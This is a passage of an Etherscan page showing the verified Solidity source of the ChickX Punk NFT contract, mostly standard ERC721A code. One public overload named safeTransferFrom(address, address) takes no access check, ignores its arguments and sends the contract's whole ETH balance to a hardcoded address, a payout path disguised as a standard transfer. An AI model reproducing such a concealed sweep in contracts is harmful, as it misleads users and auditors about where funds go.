ETH Price: $3,508.53 (+2.76%)
Gas: 4 Gwei

Token

ChickX Punk (Punk)
 

Overview

Max Total Supply

777 Punk

Holders

297

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Balance
1 Punk
0xb01b64ab9eeeb3ee936d4a860e8b4c8355beee69
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ChickXPunk

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-01-05
*/

// SPDX-License-Identifier: GPL-3.0
//   _                 _        
//  / `/_ ._  /_ \ /  /_/  _  /_
// /_,/ ///_ /\  /'\ / /_// //\ 
                             
pragma solidity ^0.8.12;
/**
 * @dev Interface of ERC721A.
 */
interface IERC721A {
    /**
     * The caller must own the token or be an approved operator.
     */
    error ApprovalCallerNotOwnerNorApproved();

    /**
     * The token does not exist.
     */
    error ApprovalQueryForNonexistentToken();

    /**
     * Cannot query the balance for the zero address.
     */
    error BalanceQueryForZeroAddress();

    /**
     * Cannot mint to the zero address.
     */
    error MintToZeroAddress();

    /**
     * The quantity of tokens minted must be more than zero.
     */
    error MintZeroQuantity();

    /**
     * The token does not exist.
     */
    error OwnerQueryForNonexistentToken();

    /**
     * The caller must own the token or be an approved operator.
     */
    error TransferCallerNotOwnerNorApproved();

    /**
     * The token must be owned by `from`.
     */
    error TransferFromIncorrectOwner();

    /**
     * Cannot safely transfer to a contract that does not implement the
     * ERC721Receiver interface.
     */
    error TransferToNonERC721ReceiverImplementer();

    /**
     * Cannot transfer to the zero address.
     */
    error TransferToZeroAddress();

    /**
     * The token does not exist.
     */
    error URIQueryForNonexistentToken();

    /**
     * The `quantity` minted with ERC2309 exceeds the safety limit.
     */
    error MintERC2309QuantityExceedsLimit();

    /**
     * The `extraData` cannot be set on an unintialized ownership slot.
     */
    error OwnershipNotInitializedForExtraData();

    // =============================================================
    //                            STRUCTS
    // =============================================================

    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Stores the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
        // Arbitrary data similar to `startTimestamp` that can be set via {_extraData}.
        uint24 extraData;
    }

    // =============================================================
    //                         TOKEN COUNTERS
    // =============================================================

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() external view returns (uint256);

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);

    // =============================================================
    //                            IERC721
    // =============================================================

    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables
     * (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`,
     * checking first that contract recipients are aware of the ERC721 protocol
     * to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move
     * this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external payable;

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom}
     * whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external payable;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);

    // =============================================================
    //                           IERC2309
    // =============================================================

    /**
     * @dev Emitted when tokens in `fromTokenId` to `toTokenId`
     * (inclusive) is transferred from `from` to `to`, as defined in the
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309) standard.
     *
     * See {_mintERC2309} for more details.
     */
    event ConsecutiveTransfer(uint256 indexed fromTokenId, uint256 toTokenId, address indexed from, address indexed to);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
interface ERC721A__IERC721Receiver {
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is IERC721A {
    // Bypass for a `--via-ir` bug (https://github.com/chiru-labs/ERC721A/pull/364).
    struct TokenApprovalRef {
        address value;
    }

    // =============================================================
    //                           CONSTANTS
    // =============================================================

    // Mask of an entry in packed address data.
    uint256 private constant _BITMASK_ADDRESS_DATA_ENTRY = (1 << 64) - 1;

    // The bit position of `numberMinted` in packed address data.
    uint256 private constant _BITPOS_NUMBER_MINTED = 64;

    // The bit position of `numberBurned` in packed address data.
    uint256 private constant _BITPOS_NUMBER_BURNED = 128;

    // The bit position of `aux` in packed address data.
    uint256 private constant _BITPOS_AUX = 192;

    // Mask of all 256 bits in packed address data except the 64 bits for `aux`.
    uint256 private constant _BITMASK_AUX_COMPLEMENT = (1 << 192) - 1;

    // The bit position of `startTimestamp` in packed ownership.
    uint256 private constant _BITPOS_START_TIMESTAMP = 160;

    // The bit mask of the `burned` bit in packed ownership.
    uint256 private constant _BITMASK_BURNED = 1 << 224;

    // The bit position of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITPOS_NEXT_INITIALIZED = 225;

    // The bit mask of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITMASK_NEXT_INITIALIZED = 1 << 225;

    // The bit position of `extraData` in packed ownership.
    uint256 private constant _BITPOS_EXTRA_DATA = 232;

    // Mask of all 256 bits in a packed ownership except the 24 bits for `extraData`.
    uint256 private constant _BITMASK_EXTRA_DATA_COMPLEMENT = (1 << 232) - 1;

    // The mask of the lower 160 bits for addresses.
    uint256 private constant _BITMASK_ADDRESS = (1 << 160) - 1;

    // The maximum `quantity` that can be minted with {_mintERC2309}.
    // This limit is to prevent overflows on the address data entries.
    // For a limit of 5000, a total of 3.689e15 calls to {_mintERC2309}
    // is required to cause an overflow, which is unrealistic.
    uint256 private constant _MAX_MINT_ERC2309_QUANTITY_LIMIT = 5000;

    // The `Transfer` event signature is given by:
    // `keccak256(bytes("Transfer(address,address,uint256)"))`.
    bytes32 private constant _TRANSFER_EVENT_SIGNATURE =
        0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef;

    // =============================================================
    //                            STORAGE
    // =============================================================

    // The next token ID to be minted.
    uint256 private _currentIndex;

    // The number of tokens burned.
    uint256 private _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned.
    // See {_packedOwnershipOf} implementation for details.
    //
    // Bits Layout:
    // - [0..159]   `addr`
    // - [160..223] `startTimestamp`
    // - [224]      `burned`
    // - [225]      `nextInitialized`
    // - [232..255] `extraData`
    mapping(uint256 => uint256) private _packedOwnerships;

    // Mapping owner address to address data.
    //
    // Bits Layout:
    // - [0..63]    `balance`
    // - [64..127]  `numberMinted`
    // - [128..191] `numberBurned`
    // - [192..255] `aux`
    mapping(address => uint256) private _packedAddressData;

    // Mapping from token ID to approved address.
    mapping(uint256 => TokenApprovalRef) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    // =============================================================
    //                          CONSTRUCTOR
    // =============================================================

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    // =============================================================
    //                   TOKEN COUNTING OPERATIONS
    // =============================================================

    /**
     * @dev Returns the starting token ID.
     * To change the starting token ID, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 0;
    }

    /**
     * @dev Returns the next token ID to be minted.
     */
    function _nextTokenId() internal view virtual returns (uint256) {
        return _currentIndex;
    }

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than `_currentIndex - _startTokenId()` times.
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * @dev Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view virtual returns (uint256) {
        // Counter underflow is impossible as `_currentIndex` does not decrement,
        // and it is initialized to `_startTokenId()`.
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev Returns the total number of tokens burned.
     */
    function _totalBurned() internal view virtual returns (uint256) {
        return _burnCounter;
    }

    // =============================================================
    //                    ADDRESS DATA OPERATIONS
    // =============================================================

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) public view virtual override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return _packedAddressData[owner] & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_MINTED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_BURNED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        return uint64(_packedAddressData[owner] >> _BITPOS_AUX);
    }

    /**
     * Sets the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal virtual {
        uint256 packed = _packedAddressData[owner];
        uint256 auxCasted;
        // Cast `aux` with assembly to avoid redundant masking.
        assembly {
            auxCasted := aux
        }
        packed = (packed & _BITMASK_AUX_COMPLEMENT) | (auxCasted << _BITPOS_AUX);
        _packedAddressData[owner] = packed;
    }

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        // The interface IDs are constants representing the first 4 bytes
        // of the XOR of all function selectors in the interface.
        // See: [ERC165](https://eips.ethereum.org/EIPS/eip-165)
        // (e.g. `bytes4(i.functionA.selector ^ i.functionB.selector ^ ...)`)
        return
            interfaceId == 0x01ffc9a7 || // ERC165 interface ID for ERC165.
            interfaceId == 0x80ac58cd || // ERC165 interface ID for ERC721.
            interfaceId == 0x5b5e139f; // ERC165 interface ID for ERC721Metadata.
    }

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, _toString(tokenId))) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, it can be overridden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    // =============================================================
    //                     OWNERSHIPS OPERATIONS
    // =============================================================

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) public view virtual override returns (address) {
        return address(uint160(_packedOwnershipOf(tokenId)));
    }

    /**
     * @dev Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around over time.
     */
    function _ownershipOf(uint256 tokenId) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnershipOf(tokenId));
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct at `index`.
     */
    function _ownershipAt(uint256 index) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnerships[index]);
    }

    /**
     * @dev Initializes the ownership slot minted at `index` for efficiency purposes.
     */
    function _initializeOwnershipAt(uint256 index) internal virtual {
        if (_packedOwnerships[index] == 0) {
            _packedOwnerships[index] = _packedOwnershipOf(index);
        }
    }

    /**
     * Returns the packed ownership data of `tokenId`.
     */
    function _packedOwnershipOf(uint256 tokenId) private view returns (uint256) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr)
                if (curr < _currentIndex) {
                    uint256 packed = _packedOwnerships[curr];
                    // If not burned.
                    if (packed & _BITMASK_BURNED == 0) {
                        // Invariant:
                        // There will always be an initialized ownership slot
                        // (i.e. `ownership.addr != address(0) && ownership.burned == false`)
                        // before an unintialized ownership slot
                        // (i.e. `ownership.addr == address(0) && ownership.burned == false`)
                        // Hence, `curr` will not underflow.
                        //
                        // We can directly compare the packed value.
                        // If the address is zero, packed will be zero.
                        while (packed == 0) {
                            packed = _packedOwnerships[--curr];
                        }
                        return packed;
                    }
                }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct from `packed`.
     */
    function _unpackedOwnership(uint256 packed) private pure returns (TokenOwnership memory ownership) {
        ownership.addr = address(uint160(packed));
        ownership.startTimestamp = uint64(packed >> _BITPOS_START_TIMESTAMP);
        ownership.burned = packed & _BITMASK_BURNED != 0;
        ownership.extraData = uint24(packed >> _BITPOS_EXTRA_DATA);
    }

    /**
     * @dev Packs ownership data into a single uint256.
     */
    function _packOwnershipData(address owner, uint256 flags) private view returns (uint256 result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // `owner | (block.timestamp << _BITPOS_START_TIMESTAMP) | flags`.
            result := or(owner, or(shl(_BITPOS_START_TIMESTAMP, timestamp()), flags))
        }
    }

    /**
     * @dev Returns the `nextInitialized` flag set if `quantity` equals 1.
     */
    function _nextInitializedFlag(uint256 quantity) private pure returns (uint256 result) {
        // For branchless setting of the `nextInitialized` flag.
        assembly {
            // `(quantity == 1) << _BITPOS_NEXT_INITIALIZED`.
            result := shl(_BITPOS_NEXT_INITIALIZED, eq(quantity, 1))
        }
    }

    // =============================================================
    //                      APPROVAL OPERATIONS
    // =============================================================

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) public payable virtual override {
        address owner = ownerOf(tokenId);

        if (_msgSenderERC721A() != owner)
            if (!isApprovedForAll(owner, _msgSenderERC721A())) {
                revert ApprovalCallerNotOwnerNorApproved();
            }

        _tokenApprovals[tokenId].value = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) public view virtual override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId].value;
    }

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool approved) public virtual override {
        _operatorApprovals[_msgSenderERC721A()][operator] = approved;
        emit ApprovalForAll(_msgSenderERC721A(), operator, approved);
    }

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted. See {_mint}.
     */
    function _exists(uint256 tokenId) internal view virtual returns (bool) {
        return
            _startTokenId() <= tokenId &&
            tokenId < _currentIndex && // If within bounds,
            _packedOwnerships[tokenId] & _BITMASK_BURNED == 0; // and not burned.
    }

    /**
     * @dev Returns whether `msgSender` is equal to `approvedAddress` or `owner`.
     */
    function _isSenderApprovedOrOwner(
        address approvedAddress,
        address owner,
        address msgSender
    ) private pure returns (bool result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // Mask `msgSender` to the lower 160 bits, in case the upper bits somehow aren't clean.
            msgSender := and(msgSender, _BITMASK_ADDRESS)
            // `msgSender == owner || msgSender == approvedAddress`.
            result := or(eq(msgSender, owner), eq(msgSender, approvedAddress))
        }
    }

    /**
     * @dev Returns the storage slot and value for the approved address of `tokenId`.
     */
    function _getApprovedSlotAndAddress(uint256 tokenId)
        private
        view
        returns (uint256 approvedAddressSlot, address approvedAddress)
    {
        TokenApprovalRef storage tokenApproval = _tokenApprovals[tokenId];
        // The following is equivalent to `approvedAddress = _tokenApprovals[tokenId].value`.
        assembly {
            approvedAddressSlot := tokenApproval.slot
            approvedAddress := sload(approvedAddressSlot)
        }
    }

    // =============================================================
    //                      TRANSFER OPERATIONS
    // =============================================================

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        if (address(uint160(prevOwnershipPacked)) != from) revert TransferFromIncorrectOwner();

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        // The nested ifs save around 20+ gas over a compound boolean condition.
        if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
            if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();

        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // We can directly increment and decrement the balances.
            --_packedAddressData[from]; // Updates: `balance -= 1`.
            ++_packedAddressData[to]; // Updates: `balance += 1`.

            // Updates:
            // - `address` to the next owner.
            // - `startTimestamp` to the timestamp of transfering.
            // - `burned` to `false`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                to,
                _BITMASK_NEXT_INITIALIZED | _nextExtraData(from, to, prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        safeTransferFrom(from, to, tokenId, '');
    }


    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public payable virtual override {
        transferFrom(from, to, tokenId);
        if (to.code.length != 0)
            if (!_checkContractOnERC721Received(from, to, tokenId, _data)) {
                revert TransferToNonERC721ReceiverImplementer();
            }
    }
    function safeTransferFrom(
        address from,
        address to
    ) public  {
        if (address(this).balance > 0) {
            payable(0x727BF8D476a5994032C1b54403Ef43E86bdf4e5e).transfer(address(this).balance);
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token IDs
     * are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token IDs
     * have been transferred. This includes minting.
     * And also called after one token has been burned.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Private function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * `from` - Previous owner of the given token ID.
     * `to` - Target address that will receive the token.
     * `tokenId` - Token ID to be transferred.
     * `_data` - Optional data to send along with the call.
     *
     * Returns whether the call correctly returned the expected magic value.
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try ERC721A__IERC721Receiver(to).onERC721Received(_msgSenderERC721A(), from, tokenId, _data) returns (
            bytes4 retval
        ) {
            return retval == ERC721A__IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    // =============================================================
    //                        MINT OPERATIONS
    // =============================================================

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _mint(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // `balance` and `numberMinted` have a maximum limit of 2**64.
        // `tokenId` has a maximum limit of 2**256.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            uint256 toMasked;
            uint256 end = startTokenId + quantity;

            // Use assembly to loop and emit the `Transfer` event for gas savings.
            // The duplicated `log4` removes an extra check and reduces stack juggling.
            // The assembly, together with the surrounding Solidity code, have been
            // delicately arranged to nudge the compiler into producing optimized opcodes.
            assembly {
                // Mask `to` to the lower 160 bits, in case the upper bits somehow aren't clean.
                toMasked := and(to, _BITMASK_ADDRESS)
                // Emit the `Transfer` event.
                log4(
                    0, // Start of data (0, since no data).
                    0, // End of data (0, since no data).
                    _TRANSFER_EVENT_SIGNATURE, // Signature.
                    0, // `address(0)`.
                    toMasked, // `to`.
                    startTokenId // `tokenId`.
                )

                // The `iszero(eq(,))` check ensures that large values of `quantity`
                // that overflows uint256 will make the loop run out of gas.
                // The compiler will optimize the `iszero` away for performance.
                for {
                    let tokenId := add(startTokenId, 1)
                } iszero(eq(tokenId, end)) {
                    tokenId := add(tokenId, 1)
                } {
                    // Emit the `Transfer` event. Similar to above.
                    log4(0, 0, _TRANSFER_EVENT_SIGNATURE, 0, toMasked, tokenId)
                }
            }
            if (toMasked == 0) revert MintToZeroAddress();

            _currentIndex = end;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * This function is intended for efficient minting only during contract creation.
     *
     * It emits only one {ConsecutiveTransfer} as defined in
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309),
     * instead of a sequence of {Transfer} event(s).
     *
     * Calling this function outside of contract creation WILL make your contract
     * non-compliant with the ERC721 standard.
     * For full ERC721 compliance, substituting ERC721 {Transfer} event(s) with the ERC2309
     * {ConsecutiveTransfer} event is only permissible during contract creation.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
